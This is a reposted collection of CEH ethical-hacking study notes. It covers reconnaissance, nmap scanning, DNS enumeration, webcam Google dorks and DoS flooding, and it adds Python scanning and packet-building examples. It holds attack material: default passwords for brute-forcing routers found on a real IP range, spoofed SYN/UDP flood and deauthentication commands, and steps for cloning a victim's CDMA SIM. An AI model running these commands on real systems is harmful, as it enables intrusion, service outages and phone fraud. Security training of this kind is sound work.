Hacking in Shadows by Raghav Bisht

Root-X Security | Haxa-1 Null Lambda:X | 12/31/2014
Root-X, Shadow Walker & Raghav
Hacking In Shadow CEH Practical Notes

Uploaded by raghu-bisht, posted 16-Jul-2015



Page 2: Hacking in shadows By - Raghav Bisht

December 31, 2014

[HACKING IN SHADOW CEH PRACTICAL NOTES]

CONTENT

Foot-printing

Scanning/Banner Grabbing

Enumeration

Google Hacking

Information Gathering [Automated Process ]

DoS and DDoS Attacks

IDS - IPS - Firewall - Antivirus - Honey-pots

Mobile Hacking

Sniffing

Social Engineering

Web-servers & Web-application Hacking

System Hacking

Malware

Penetration testing

Buffer Overflow

Wi-Fi Hacking


FOOTPRINTING

1. Whois databases
   domaintools.com
   yougetsignal.com
   Sam Spade [ whois tool ]
   net-Tools 5 [ networking tools ]
   robtex.com

2. Important sites
   archive.org [ old copies of the target site ]

3. Mirroring websites
   httrack
   IDM --> Grabber

4. Reverse IP lookup
   yougetsignal.com
   robtex.com

5. ping, netstat, nslookup, tracert (Windows CMD commands)

ping
   ping google.com
   ping -t google.com          [ keep pinging until Ctrl+C ]
   ping -l 1024 google.com     [ 1024-byte payload ]
   ping -n 10 google.com       [ send 10 echo requests ]

netstat
   netstat
   netstat -a                  [ all connections and listening ports ]
   netstat -n -o -a            [ numeric addresses, owning process ID ]

nslookup
   nslookup www.site.com

tracert
   tracert www.site.com


6. Email harvesting

Tools :
   Sam Spade
   Black Widow
   GSA Email Spider
   Email Extractor
   Metasploit [ BackTrack, Kali Linux ]

msfconsole
   search gather                                  [ lists the information-gathering auxiliary modules ]
   use auxiliary/gather/search_email_collector    [ harvests addresses for a domain from search engines ]
   set DOMAIN <domain name>
   run                                            [ "exploit" also works as an alias ]


Scanning & Banner Grabbing

1. Network Scanning
   IP scanning
   port scanning

Eg. IP scanning first. Check it out : http://120.59.128.29

I. Angry IP Scanner : sweeps any range from 0.0.0.0 to 255.255.255.255 using a ping sweep, so let's start.
   Our target : 120.59.128.1 - 120.59.128.255
   On ports : 80, 21, 443, 110
   Open one of the live IPs on port 80 -> it shows an ADSL modem login page. To get past the modem login, try a brute-force or dictionary attack.

Eg. Common default / weak passwords :
   admin
   user
   custom
   manager
   abc123
   abc@123
   password
   pa55w0rd
   Pa55w0Rd
   admin@123
   123456
   passwd
   admin123
   user123

II. Nmap / Zenmap

III. Port scanner

IV. Network scan ( netdiscover [ BT tool ] ) : ARP-based discovery of live hosts on the local segment
   netdiscover -i <interface> -r <target>/24   [ /24 or /16 <--- subnet ]
   netdiscover -i eth0 -r 192.168.1.0/24
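Added example (written for these notes, not part of the original): the full-connect scan and banner grab in Python, the same three-way handshake nmap -sT performs, with the three verdicts spelled out. It runs offline against a constructed listener on 127.0.0.1 whose port is chosen by the OS and whose FTP-style greeting is made up for the demo; a "filtered" verdict cannot appear on loopback because nothing there drops the SYN.

```python
import socket
import threading
from concurrent.futures import ThreadPoolExecutor


def tcp_connect_scan(host, ports, timeout=0.5, workers=32):
    """Full TCP connect() scan, the handshake nmap -sT performs.
    Returns {port: "open" | "closed" | "filtered"}:
      handshake completes      -> open
      RST back (ECONNREFUSED)  -> closed
      nothing before timeout   -> filtered (something dropped the SYN)
    """
    def probe(port):
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(timeout)
        try:
            sock.connect((host, port))
            return port, "open"
        except ConnectionRefusedError:
            return port, "closed"
        except OSError:                  # timeout, host unreachable, ...
            return port, "filtered"
        finally:
            sock.close()

    with ThreadPoolExecutor(max_workers=workers) as pool:
        return dict(pool.map(probe, ports))


def grab_banner(host, port, timeout=1.0, nbytes=256):
    """Read whatever the service volunteers right after connect.
    FTP, SMTP and SSH announce themselves; HTTP stays silent until asked,
    so an empty result means 'no greeting', not 'no service'."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        try:
            return sock.recv(nbytes)
        except socket.timeout:
            return b""


def start_fake_service(banner=b"220 lab-ftp ready\r\n"):
    """Constructed stand-in for a real service: a listener on an OS-chosen
    loopback port that sends `banner` to every client. Returns (socket, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(16)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:              # listener closed -> stop serving
                return
            with conn:
                try:
                    conn.sendall(banner)
                except OSError:          # scanner hung up before reading
                    pass

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def unused_port():
    """Bind-and-release trick: a loopback port nothing is listening on."""
    tmp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tmp.bind(("127.0.0.1", 0))
    port = tmp.getsockname()[1]
    tmp.close()
    return port


def demo():
    """Scan one open and one closed loopback port, then grab the banner."""
    srv, open_port = start_fake_service()
    closed_port = unused_port()
    try:
        states = tcp_connect_scan("127.0.0.1", [open_port, closed_port])
        banner = grab_banner("127.0.0.1", open_port)
    finally:
        srv.close()
    return states[open_port], states[closed_port], banner


if __name__ == "__main__":
    print(demo())    # ('open', 'closed', b'220 lab-ftp ready\r\n')
```

A connect scan completes the handshake, so every probe shows up in the target's application logs; that is the trade-off against the half-open -sS scan in the Nmap list below.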


2. Vulnerability scanning

I ] Vulnerability scanners (Acunetix, Netsparker, Nessus, GFI LanGuard etc.) and BackTrack tools

Whatweb [ fingerprints the web application stack ] [ BackTrack tool ]
   Eg: ./whatweb bytec0de.com

joomscan [ scans Joomla sites ] [ /pentest/web/joomscan ]
   Eg: ./joomscan.pl -u http://liclanka.com/

Nikto :
   Eg: ./nikto.pl -host liclanka.com

Websecurify
   Applications > BackTrack > Exploitation Tools > Web Exploitation Tools > websecurify

Vega
   Applications > BackTrack > Vulnerability Assessment > Web Application > Web Vulnerability Scanner > vega

w3af
   Applications > BackTrack > Vulnerability Assessment > Web Application > Web Vulnerability Scanner > w3af

webshag
   /pentest/enumeration/web/webshag [ ./webshag_gui.py ]


3. Nmap

Types of scans :

TYPES || Commands

1. TCP full connect scan ----> nmap -sT <target>
2. SYN half-open scan ----> nmap -sS <target>
3. Stealth scans ----> used for slipping past simple firewalls / IDS
   Xmas scan ----> nmap -sX <target>
   Null scan ----> nmap -sN <target>
   FIN scan ----> nmap -sF <target>
   [ these rely on RFC 793 behaviour; Windows and many network devices answer every probe with RST, so every port shows as closed ]
4. List scan ----> nmap -sL <target>  or  nmap -sL -iL list.txt   [ only lists the targets, sends nothing ]
5. UDP scan ----> nmap -sU <target>
6. Ping scan ----> nmap -sn <target>   [ host discovery only; -sP is the old name of the same option ]
7. ACK scan ----> nmap -sA <target>
8. Window scan ----> nmap -sW <target>
9. Version scan ----> nmap -sV <target>   [ -v is verbosity, not version detection ]
10. Timing ----> -T0, -T1, -T2 slow, for getting under rate-based detection ; -T3 default ; -T4, -T5 aggressive timing
11. Quick scan ----> nmap -F <target>
12. Intense scan ----> nmap -T4 -A -v <target>
13. Intense scan + UDP ----> nmap -sS -sU -T4 -A -v <target>
14. Intense scan, all TCP ports ----> nmap -p 1-65535 -T4 -A -v <target>
15. Intense scan, no ping ----> nmap -T4 -A -v -Pn <target>
16. Quick scan plus ----> nmap -sV -T4 -O -F --version-light <target>
17. Quick traceroute ----> nmap -sn --traceroute <target>
18. Slow comprehensive scan ----> nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script "default or (discovery and safe)" <target>

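Added example (not from the original notes): how nmap turns the reply to each probe type above into the port state it prints, which is what separates a SYN scan from the FIN/NULL/Xmas "stealth" trio and the ACK scan. The decision rules follow nmap's documented behaviour; the Reply class and the sample probes are a constructed model of decoded packets, not nmap's code.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Reply:
    """One probe's response as a sniffer would decode it (constructed model).
    kind: "tcp", "udp", "icmp" or "none" (nothing came back after retries)."""
    kind: str
    flags: str = ""        # TCP flag letters: "SA" = SYN/ACK, "RA" = RST/ACK
    window: int = 0        # TCP window, only meaningful for -sW
    icmp_type: int = 0
    icmp_code: int = 0


NO_REPLY = Reply("none")

# ICMP destination-unreachable codes nmap reads as "a filter is in the way"
FILTER_CODES = {1, 2, 3, 9, 10, 13}


def classify(scan, reply):
    """Port state nmap would print for `scan` given `reply`.
    scan is the nmap switch without the dash: sS sT sF sN sX sA sW sU."""
    if reply.kind == "icmp" and reply.icmp_type == 3:
        if scan == "sU" and reply.icmp_code == 3:
            return "closed"                      # port unreachable: nobody listening
        if reply.icmp_code in FILTER_CODES:
            return "filtered"
    is_rst = reply.kind == "tcp" and "R" in reply.flags
    if scan in ("sS", "sT"):
        if reply.kind == "tcp" and "S" in reply.flags and "A" in reply.flags:
            return "open"
        return "closed" if is_rst else "filtered"
    if scan in ("sF", "sN", "sX"):               # the "stealth" trio
        if is_rst:
            return "closed"
        return "open|filtered" if reply.kind == "none" else "filtered"
    if scan == "sA":                             # maps firewall rules, not ports
        return "unfiltered" if is_rst else "filtered"
    if scan == "sW":
        if is_rst:
            return "open" if reply.window > 0 else "closed"
        return "filtered"
    if scan == "sU":
        if reply.kind == "udp":
            return "open"
        return "open|filtered" if reply.kind == "none" else "filtered"
    raise ValueError(f"unknown scan type {scan!r}")


def scan_summary(scan, replies):
    """replies: {port: Reply}. Returns {port: state}."""
    return {port: classify(scan, reply) for port, reply in replies.items()}


def stealth_scan_is_trustworthy(states):
    """FIN/NULL/Xmas results mean nothing against stacks that answer every
    probe with RST whatever the port state (Windows, many Cisco boxes):
    such a host shows every port closed. Treat that pattern as 'unknown'."""
    return any(state != "closed" for state in states.values())


if __name__ == "__main__":
    probes = {22: Reply("tcp", flags="SA"), 23: Reply("tcp", flags="RA"), 25: NO_REPLY}
    print(scan_summary("sS", probes))   # {22: 'open', 23: 'closed', 25: 'filtered'}
```

The "open|filtered" verdict is the price of the stealth scans: silence is ambiguous, so nmap cannot tell an open port from a dropped probe without a follow-up (-sV or a SYN scan of just those ports).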

Enumeration

I. Enumerate users [ to pull out details about users, like NetBIOS name, usernames etc. ]

DNS Enumeration
   robtex.com

1. dnsenum (BT)
   cd /pentest/enumeration/dns/dnsenum
   ./dnsenum.pl <target>
   ./dnsenum.pl bytecode.in

2. dnsmap (BT)
   cd /pentest/enumeration/dns/dnsmap
   ./dnsmap bytecode.in

3. dnsrecon (BT)
   cd /pentest/enumeration/dns/dnsrecon
   ./dnsrecon.py -d bytecode.in

4. dnswalk (BT)
   cd /pentest/enumeration/dns/dnswalk
   ./dnswalk bytecode.in.   <--- put a dot at the end (fully qualified name)

5. dnstracer (BT)
   dnstracer -v bytecode.com

6. dig (BT)
   dig
   dig A <target>     -> A record (IPv4 address)
   dig AAAA <target>  -> AAAA record (IPv6 address)
   dig MX <target>    -> MX (mail exchange) records
   dig NS <target>    -> name servers
   dig SOA <target>   -> start of authority
   dig SRV <target>   -> service records

7. fierce.pl (BT)
   fierce.pl -dns bytecode.in

8. nslookup (BT)
   BT ~ # nslookup
   > www.checkpoint.com
   > set type=mx        [ MX records ]
   > checkpoint.com
   > set type=ns        [ NS records ]
   > checkpoint.com

9. Automating lookups
   Forward lookup brute force   [ try a wordlist of hostnames under the domain ]
   Reverse lookup brute force   [ PTR lookups across the target's IP ranges ]
   Zone transfers               [ ask each name server for the whole zone (AXFR) ]
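Added example (not from the original notes): a forward lookup brute force of the kind dnsmap and fierce perform, with the wildcard check those tools run first, because a zone with *.domain answering makes every guessed name look real. The zone, wordlist and fake_resolve resolver are constructed so it runs offline; passing resolve=None uses the real system resolver.

```python
import random
import socket
import string


def random_label(length=12):
    """A label that will not exist in any real zone."""
    return "".join(random.choice(string.ascii_lowercase) for _ in range(length))


def system_resolve(name):
    """Default resolver: IPv4 addresses for `name`, [] on NXDOMAIN."""
    try:
        infos = socket.getaddrinfo(name, None, socket.AF_INET)
    except socket.gaierror:
        return []
    return sorted({info[4][0] for info in infos})


def detect_wildcard(domain, resolve, probes=2):
    """Resolve a few impossible names. Any answer means a wildcard record,
    which would make every brute-forced name look real. Returns the wildcard IPs."""
    hits = set()
    for _ in range(probes):
        hits.update(resolve(f"{random_label()}.{domain}"))
    return hits


def forward_bruteforce(domain, wordlist, resolve=None):
    """dnsmap/fierce-style forward lookup brute force.
    resolve(name) -> list of IPs; names answered only by the wildcard are dropped.
    Caveat: a real host that happens to share the wildcard IP is dropped too."""
    resolve = resolve or system_resolve
    wildcard_ips = detect_wildcard(domain, resolve)
    found = {}
    for word in wordlist:
        name = f"{word}.{domain}"
        ips = [ip for ip in resolve(name) if ip not in wildcard_ips]
        if ips:
            found[name] = sorted(ips)
    return found


# Constructed zone so the example runs offline. *.example.com is wildcarded to
# 203.0.113.9, which is why "it resolved, so it exists" is the wrong test here.
FAKE_ZONE = {
    "www.example.com": ["203.0.113.10"],
    "mail.example.com": ["203.0.113.25"],
    "dev.example.com": ["203.0.113.30"],
}


def fake_resolve(name):
    if name in FAKE_ZONE:
        return list(FAKE_ZONE[name])
    if name.endswith(".example.com"):
        return ["203.0.113.9"]            # wildcard answer for anything else
    return []


WORDLIST = ["www", "mail", "dev", "vpn", "ftp", "admin"]


if __name__ == "__main__":
    # Pass resolve=None to hit the real resolver (only against a domain you may test).
    print(forward_bruteforce("example.com", WORDLIST, fake_resolve))
```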

Web crawling -> [ finding admin pages ]
   IDM
   HTTrack
   any vulnerability scanner


Nmap

Shared folders [ MyLanViewer ]

NetBIOS service
1. Scanning for the NetBIOS service
   SMB4K (BT) [GUI]
   smbserverscan (BT) [GUI]
2. Enumerating usernames
   samrdump (BT)
   BT smb-enum # ./samrdump.py 192.168.90.18


Google Hacking

1. http://www.googleguide.com/advanced_operators_reference.html
2. Basic search
3. Advanced search
4. Directory listing
   intitle:"index of" "parent directory"
5. Locating CGI-BIN [ Common Gateway Interface ]
   inurl:/cgi-bin/login.cgi
6. Finding exposed network cameras
   inurl:indexFrame camera
   allinurl:"view/index" filetype:shtml

== Axis ==
inurl:"view/indexFrame.shtml"
inurl:"view/index.shtml"
intitle:"Live View / - AXIS"
intitle:axis camera
intitle:"axis #Kameramodell#"

== Canon ==
inurl:sample/LvAppl/

== JVC ==
intitle:"V.Networks [Motion Picture(Java)"

== EvoCam ==
intitle:"EvoCam" inurl:"webcam.html"

== WebcamXP ==
intitle:"my webcamXP server!"


== MOBOTIX ==
inurl:/control/userimage.html

== Panasonic ==
inurl:/ViewerFrame?Mode=Motion

== FlexWatch ==
inurl:toolam.html
inurl:viewash.html

== Toshiba ==
intitle:"TOSHIBA Network Camera - User Login"

== Sony ==
inurl:/home/homeJ.html

inurl:/view.shtml
intitle:"Live View / - AXIS" | inurl:view/view.shtml
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:"live view" intitle:axis
intitle:liveapplet
allintitle:"Network Camera NetworkCamera"
intitle:axis intitle:"video server"
intitle:liveapplet inurl:LvAppl
intitle:"EvoCam" inurl:"webcam.html"
intitle:"Live NetSnap Cam-Server feed"
intitle:"Live View / - AXIS"
intitle:"Live View / - AXIS 206M"
intitle:"Live View / - AXIS 206W"
intitle:"Toshiba Network Camera" user login
intitle:"netcam live image"
intitle:"i-Catcher Console - Web Monitor"
intitle:start inurl:cgistart
intitle:"WJ-NT104 Main Page"
intext:"MOBOTIX M1" intext:"Open Menu"
intext:"MOBOTIX M10" intext:"Open Menu"
intext:"MOBOTIX D10" intext:"Open Menu"
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:"sony network camera snc-p1"
intitle:"sony network camera snc-m1"
site:.viewnetcam.com -www.viewnetcam.com


Information Gathering [ Automated Process ]

1] Information gathering :
   > Uberharvest
   > theharvester.py
   > metagoofil
   > web data extractors ( email / phone number extractors )
   > Maltego

2] People search :
   > pipl.com
   > anywho.com
   > address.com
   > social networking sites [ facebook, linkedin, twitter ]
   > job sites [ dice.com, monster.com, naukri.com ]

3] Phone number :
   > truecaller.com
   > kgdetective.com
   > phunwa.com

4] Traceroute tools :
   > Trout [ www.foundstone.com ]
   > tracert, traceroute [ commands ]

5] Email IP tracking :
   > http://blasze.tk
   > wspy.org
   > Emailtrackerpro.com
   > Readnotify.com
   > Politemail.com
   > www.whatismyip.com
   > http://www.iptrackeronline.com


DoS and DDoS Attacks


1. DOS ATTACK

An attempt to make a machine or network resource unavailable to its intended users by consuming everything it has: network bandwidth, memory of every kind, etc.

Ping of Death
   ping -t -l 65500 google.com   [ 65500 is the largest payload Windows ping accepts; the original ping of death needed a reassembled datagram larger than 65535 bytes, which modern stacks drop ]
   ping bytecode.in -l 1460 -n 10000000 -w 1
   Affected systems (historical) [ Solaris 2.4, ninix, Win 3.11, 95 ]

SYN attack
   hping3 -S 192.168.1.38 -a 192.168.1.254 -p 22 --flood
   [ -S -> SYN flag ; -p 22 -> the open SSH port ; -a -> spoofed source address (the router here), so the victim's SYN/ACKs land on the router ; 192.168.1.38 -> victim ]

UDP / HTTP / TCP flooding
   LOIC
   HOIC

Smurf attack
   make your own packet and flood the network
   pktbuilder
   packETH 1.6 [ Linux & Windows ]

CDP flooding [ Cisco Discovery Protocol ]
   yersinia [ BackTrack ]
   done against Cisco switches & routers

MAC flooding [ BT ]
   flooding network switches (overflowing the CAM table)

ARP spoofing
   NetCut [ Windows ]
   ettercap [ BackTrack ]

Deauthentication technique
   aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

   Where:
   -0 : means deauthentication
   1 : is the number of deauths to send (you can send multiple if you wish); 0 means send them continuously
   -a : MAC address of the access point ( router )
   -c : MAC address of the client to deauthenticate; if this is omitted then all clients are deauthenticated
   ath0 : is the interface name

2. D-DoS ATTACK

HTTP attack
   GET / POST methods
DNS amplification attack
NTP amplification attack
Slowloris attack [ holds many partial HTTP requests open so the server's worker pool runs out; used when a firewall blocks your IP address after a burst of complete requests ]
   [ slowloris.pl ] slowloris.pl -dns www.site.com -timeout 1 -cache

3. IPv6 flooding : [ RA flood attack ]
   Victim : Windows user
   cd /pentest/spoofing/thc-ipv6
   Advertising a fake IPv6 network [ ./fake_router6 eth1 def:c0::/64 ]
   Now flooding with router advertisements [ ./flood_router6 eth1 ]

4. Scapy [ packet manipulation tool ] [ features -> capture, create, replay, scan, discover ]

I. scapy -> Sending a packet from scapy
   send(IP(src="192.168.1.55", dst="192.168.1.1")/ICMP()/"OurPayload")   -> check it with Wireshark
   Ctrl+D to leave the scapy shell

II. scapy -> Creating our packet & sending it
   L2=Ether()
   L3=IP()
   L4=TCP()
   L2.show()
   L2=Ether(src="01:23:45:67:89:ab")
   L3=IP(ttl=99, dst="192.168.1.1")
   del(L3.dst)
   L3.dst="192.168.1.2"
   L4=TCP(sport=6783, dport=22, flags="A")     [ the keyword is flags, not flag ]
   L4.show()
   sendp(L2/L3/L4)                              -> sends at layer 2 (sendp), since the packet starts with Ether()

III. scapy -> Sniffing with scapy
   sniff(iface="eth0", prn=lambda x: x.show())       -> show full packet detail
   Ctrl+C
   sniff(iface="eth0", prn=lambda x: x.summary())    -> one line per packet, no full detail
   sniff(filter="host 192.168.1.1", count=5)
   a=_                                               -> keep the last result
   a.nsummary()
   a[1]
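Added example (not from the original notes): the IPv4 and TCP headers that Scapy's IP()/TCP() layers build, assembled by hand with the RFC 1071 checksum that hping3 and packETH also compute, so the "make your own packet" step above is visible byte by byte. Addresses and ports copy the Scapy session; send_raw needs root and is not exercised here.

```python
import socket
import struct


def checksum(data: bytes) -> int:
    """RFC 1071 Internet checksum: one's-complement sum of 16-bit words, complemented."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


TCP_FLAGS = {"F": 0x01, "S": 0x02, "R": 0x04, "P": 0x08, "A": 0x10, "U": 0x20}


def ipv4_header(src, dst, payload_len, proto=socket.IPPROTO_TCP, ttl=64, ident=0):
    """20-byte IPv4 header, no options, checksum filled in at bytes 10-11."""
    hdr = struct.pack("!BBHHHBBH4s4s",
                      (4 << 4) | 5, 0, 20 + payload_len, ident, 0, ttl, proto, 0,
                      socket.inet_aton(src), socket.inet_aton(dst))
    return hdr[:10] + struct.pack("!H", checksum(hdr)) + hdr[12:]


def tcp_header(src, dst, sport, dport, seq=0, ack=0, flags="S", window=65535, payload=b""):
    """20-byte TCP header. The checksum covers a pseudo-header (src, dst, proto,
    length) plus the TCP header and payload, which is why src/dst are needed here."""
    flag_bits = sum(TCP_FLAGS[f] for f in flags)
    hdr = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flag_bits, window, 0, 0)
    pseudo = struct.pack("!4s4sBBH", socket.inet_aton(src), socket.inet_aton(dst),
                         0, socket.IPPROTO_TCP, len(hdr) + len(payload))
    return hdr[:16] + struct.pack("!H", checksum(pseudo + hdr + payload)) + hdr[18:]


def build_tcp(src, dst, sport, dport, flags="S", seq=0, ttl=64):
    """Complete IPv4+TCP datagram: the hand-rolled version of IP()/TCP() above."""
    tcp = tcp_header(src, dst, sport, dport, seq=seq, flags=flags)
    return ipv4_header(src, dst, len(tcp), ttl=ttl) + tcp


def checksums_valid(packet):
    """A receiver's check: summing a header *including* its checksum field
    must give 0xFFFF, i.e. checksum() returns 0 for both headers."""
    ip, tcp = packet[:20], packet[20:]
    pseudo = struct.pack("!4s4sBBH", ip[12:16], ip[16:20], 0, socket.IPPROTO_TCP, len(tcp))
    return checksum(ip) == 0 and checksum(pseudo + tcp) == 0


def decode(packet):
    """Pull the fields a sniffer would show back out of the bytes."""
    ttl, proto = packet[8], packet[9]
    src, dst = socket.inet_ntoa(packet[12:16]), socket.inet_ntoa(packet[16:20])
    sport, dport, seq = struct.unpack("!HHI", packet[20:28])
    bits = packet[33]                      # TCP flags byte: offset 13 inside the TCP header
    flags = "".join(letter for letter, bit in TCP_FLAGS.items() if bits & bit)
    return {"src": src, "dst": dst, "ttl": ttl, "proto": proto,
            "sport": sport, "dport": dport, "seq": seq, "flags": flags}


def send_raw(packet, dst):
    """Put the datagram on the wire as built; needs root/CAP_NET_RAW (not run here)."""
    with socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) as raw:
        raw.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
        raw.sendto(packet, (dst, 0))


if __name__ == "__main__":
    pkt = build_tcp("192.168.1.55", "192.168.1.38", 6783, 80, flags="S", seq=1000, ttl=99)
    print(decode(pkt), checksums_valid(pkt))
```

Because the source address is just another field here, spoofing (hping3 -a, --rand-source) is nothing more than writing a different value into bytes 12-15 and recomputing both checksums; nothing on the sending host checks it.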

5. Hping3 [ port scanning, SYN, ACK, IP, other host discovery, sniffer, flooding, file transfer ]
   hping3 -h "or" man hping3 [ help menu ]

   hping3 -S www.lpu.in -p 80 -c 2                     [ -S -> SYN request, -c -> how many packets to send ]
   hping3 -S 192.168.1.38 -p ++50 -c 5                 [ ++50 -> the port increases with each packet: 50, 51, 52, 53, 54 ]
   hping3 -1 192.168.1.x --rand-dest -I eth0           [ -1 -> ICMP ; ping all possible IP addresses in random order ]
   hping3 -1 192.168.1.1 --icmp-ts -c 2                [ ICMP timestamp request ]
   hping3 -8 50-56 -S 8.8.8.8                          [ -8 -> scan mode, 50-56 -> ports, 8.8.8.8 -> Google DNS server ]
   hping3 -2 192.168.1.6 -p 80 -c 1                    [ -2 -> UDP ]
   hping3 -F -P -U 192.168.1.38 -c 3                   [ -F -> FIN, -P -> PUSH, -U -> URGENT ] [ Xmas scan ]
   hping3 192.168.1.38 -Q -p 139 -s <source port>      [ -Q -> show only TCP sequence numbers, -s -> base source port ]
   hping3 -S 192.168.1.38 -a 192.168.1.254 -p 22 --flood
      [ -S -> SYN, -p 22 -> open SSH port, -a -> spoofed source address (the router), 192.168.1.38 -> victim ; SYN flood with the replies aimed at the router ]
   hping3 --rand-source <target IP> --flood -S -L 0 -p 80
   hping3 -2 www.lpu.in -p ++44444 -T -n               [ traceroute using UDP ] [ Ctrl+Z if it doesn't respond ]
   hping3 -S www.lpu.in -p 53 -T                       [ traceroute using TCP ]


NOTE : hping3 also works as an interpreter (Tcl scripting), much like scapy.
   hping3
   hping send "ip(saddr=192.168.1.55,daddr=192.168.1.38,ttl=15)+tcp(sport=6783,dport=80,flags=s)"

6. CDP flooding [ Cisco Discovery Protocol ] [ exhausts the CPU of routers & switches ]
   yersinia -G
   Launch attack
   CDP
   flood CDP table
   ok
   List attacks
   cancel all attacks

7. HTTP flood attack ApacheBench [ tool, BT ]
   ab -c 1000 -n 10000 http://<your IP address>/

8. UDP flood attack
   hping3 --flood --rand-source --udp -p 53 <target IP address>

*9. SYN flood attack
   hping3 --rand-source <target IP address> --flood -S -L 0 -p 80

NOTE : slowloris.pl (see the Slowloris attack above)

IDS - IPS - Firewall - Antivirus - Honeypots

1. Firewall

I. Windows Firewall [ netsh ]
   netsh /?
   netsh lan /?
   help
   firewall
   help
   netsh firewall set portopening tcp 445 smb enable   --> opens a port on my system (legacy "netsh firewall" context, XP/2003 era)

TCP/IP troubleshooting and interface resets :
   Install the TCP/IP protocol   - netsh int ipv4 install
   Uninstall the TCP/IP protocol - netsh int ipv4 uninstall

Configure the Windows Advanced Firewall :
   Show all firewall rules
      netsh advfirewall firewall show rule name=all
   Delete an inbound advanced firewall rule for port 21
      netsh advfirewall firewall delete rule name=all protocol=tcp localport=21
   Export Windows Advanced Firewall settings
      netsh advfirewall export "c:\advfirewall.wfw"

Perhaps the most common command you might use is the one that enables or disables the Windows firewall (legacy context) :
   netsh firewall set opmode disable
   netsh firewall set opmode enable

1. To deny all incoming connections and allow all outgoing connections :
   netsh advfirewall set allprofiles firewallpolicy blockinbound,allowoutbound

2. To enable the firewall :
   netsh advfirewall set allprofiles state on
   netsh firewall set opmode enable


3. To disable the firewall :
   netsh advfirewall set allprofiles state off
   netsh firewall set opmode disable

4. Allow or deny rules
   To add a rule allowing TCP or UDP incoming packets on port 80 :
      netsh advfirewall firewall add rule name="HTTP" protocol=TCP localport=80 action=allow dir=IN
      netsh advfirewall firewall add rule name="HTTP" protocol=UDP localport=80 action=allow dir=IN
   To deny TCP or UDP packets on port 80 :
      netsh advfirewall firewall add rule name="HTTP" protocol=TCP localport=80 action=block dir=IN
      netsh advfirewall firewall add rule name="HTTP" protocol=UDP localport=80 action=block dir=IN
   [ block rules win over allow rules in Windows Firewall, whatever order they were added in ]

5. Delete a rule
   To delete a rule issue the following command :
      netsh advfirewall firewall delete rule name="HTTP"
   [ deletes every rule called HTTP ]

6. Allow or deny incoming connections for a specific port and IP
   To allow from a specific IP :
      netsh advfirewall firewall add rule name="HTTP" protocol=TCP localport=80 action=allow dir=IN remoteip=x.x.x.x
   To deny from a specific IP :
      netsh advfirewall firewall add rule name="HTTP" protocol=TCP localport=80 action=block dir=IN remoteip=x.x.x.x
   Allow or deny a subnet :
      netsh advfirewall firewall add rule name="HTTP" protocol=TCP localport=80 action=block dir=IN remoteip=x.x.x.x/24


   or
      netsh advfirewall firewall add rule name="HTTP" protocol=TCP localport=80 action=allow dir=IN remoteip=x.x.x.x-x.x.x.x
   or
      netsh advfirewall firewall add rule name="HTTP" protocol=TCP localport=80 action=block dir=IN remoteip=localsubnet

2. Linux Firewall [ iptables ]

IP address blocking
   iptables -A INPUT -s <IP address> -j DROP
   iptables -A INPUT -s <IP address> -p tcp --destination-port 80 -j DROP
   iptables -A INPUT -s <IP address> -p tcp --destination-port 443 -j DROP
   sudo ufw deny from <IP address>
   [ -A appends to the end of the chain: an earlier ACCEPT rule still wins; use -I INPUT to insert at the top ]

IP address allowing
   iptables -D INPUT -s <IP address> -j DROP   [ -D deletes the matching DROP rule ]
   sudo ufw allow from <IP address>

3. Honeypots
   Net Tools
   Hack Trapper


Honeybot

Port Scan Attack Detector


Mobile Hacking

1. SIM Cloning
   SIM - Subscriber Identity Module
   IMSI - International Mobile Subscriber Identity
   IMEI - International Mobile Station Equipment Identity
   ESN - Electronic Serial Number
   MIN - Mobile Identification Number

CDMA SIM cloning :
   1. check for USB drivers
   2. attach the phone over USB
   3. check for the port : "right click on My Computer > Manage > Device Manager > Ports"
   4. open CDMA Workshop 2.7.0, set the port, press Read [ all details of the phone will be saved ]
   5. give the victim's phone back to him
   6. attach the Reliance Netconnect data card (http://kollam.olx.in/reliance-netconnect-zte-880-cdma-1x-iid-449181852)
      > http://www.priceindia.org/broadband/reliance/zte-mg-880-data-card-price/
   7. check the port again
   8. open CDMA Workshop v2.7.0 --> set the port
   9. write all the SIM details to the ZTE MG-880 data card


2. Android Rooting


Useful apps :
   FX File Explorer Plus v2.3.1.7 ROOT + All Add-Ons
   Root Explorer v3.1.7 for Android 2.3 & 3.0+
   SD Maid Pro v3.0.2.8 ROOT + Unlocker
   SuperSU v1.93 + SuperSU Pro Key
   Lucky Patcher v4.3.1.apk
   SRSRoot v4.7 Android SRS Root
   SuperSU v1.93
   Root.Explorer.v2.7
   SuperSU Pro Key v1.00 ROOT FULL Android

How to root your...

HTC One (M8)
   Unlock your bootloader via HTCdev.com
   Download and install TWRP for the M8 from http://teamw.in/project/twrp2/225
   Flash the SuperSU root zip from http://forum.xda-developers.com/showthread.php?t=1538053

Samsung Galaxy S5
   Download the Odin flash utility from http://forum.xda-developers.com/showthread.php?t=2189539
   Download the CF-Auto-Root package from http://forum.xda-developers.com/showthread.php?t=2696537
   Extract the TAR file from the CF-Auto-Root zip. Select the TAR file as type PDA in Odin, and flash with your device in download mode (power on with Home and Volume Down held)

Sony Xperia Z2
